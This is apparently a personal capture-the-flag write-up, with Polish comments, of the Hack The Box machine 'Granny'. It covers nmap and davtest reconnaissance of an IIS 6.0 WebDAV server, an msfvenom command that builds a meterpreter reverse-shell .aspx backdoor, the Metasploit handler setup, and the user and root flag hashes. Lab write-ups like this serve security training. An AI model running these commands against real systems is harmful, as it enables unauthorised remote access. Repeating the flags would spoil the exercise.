Granny - 18.08.2021
NMap
┌──(kali㉿kali)-[~/htb/granny]
└─$ nmap -sC -sV 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 13:27 CEST
Nmap scan report for 10.10.10.15
Host is up (0.059s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| WebDAV type: Unknown
| Server Date: Wed, 18 Aug 2021 11:29:31 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_ Server Type: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
IIS 6.0 = Windows Server 2003
Davtest
┌──(kali㉿kali)-[~/htb/granny]
└─$ davtest -url http://10.10.10.15
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = "en_US:en",
LC_ALL = (unset),
LC_TIME = "pl_PL.UTF-8",
LANG = "en_US.UTF-8"
are supported and installed on your system.
perl: warning: Falling back to a fallback locale ("en_US.UTF-8").
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: HOZXuPVDnnbK
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_HOZXuPVDnnbK
********************************************************
Sending test files
PUT shtml FAIL
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.cfm
PUT php SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.php
PUT aspx FAIL
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.pl
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.jsp
PUT asp FAIL
PUT cgi FAIL
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.jhtml
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.txt
PUT html SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.html
********************************************************
Checking for test file execution
EXEC cfm FAIL
EXEC php FAIL
EXEC pl FAIL
EXEC jsp FAIL
EXEC jhtml FAIL
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.txt
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.html
********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.cfm
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.php
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.pl
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.jsp
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.jhtml
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.txt
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.html
Executes: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.txt
Executes: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.html
Jest dostęp do PUT, MOVE, DELETE
Php nie działa, natomiast działa aspx
Tworzenie backdoora .aspx
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=9004 -f aspx >backdoor.aspx
Upload backdoora
W msfconsole ustawiamy ten sam payload! Inaczej nie zadziała
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 9004
run
I jest dostęp
Privileges Escalation
user.txt
700c5dc163014e22b3e408f8703f67d1
root.txt
aa4beed1c0584445ab463a6747bd06e9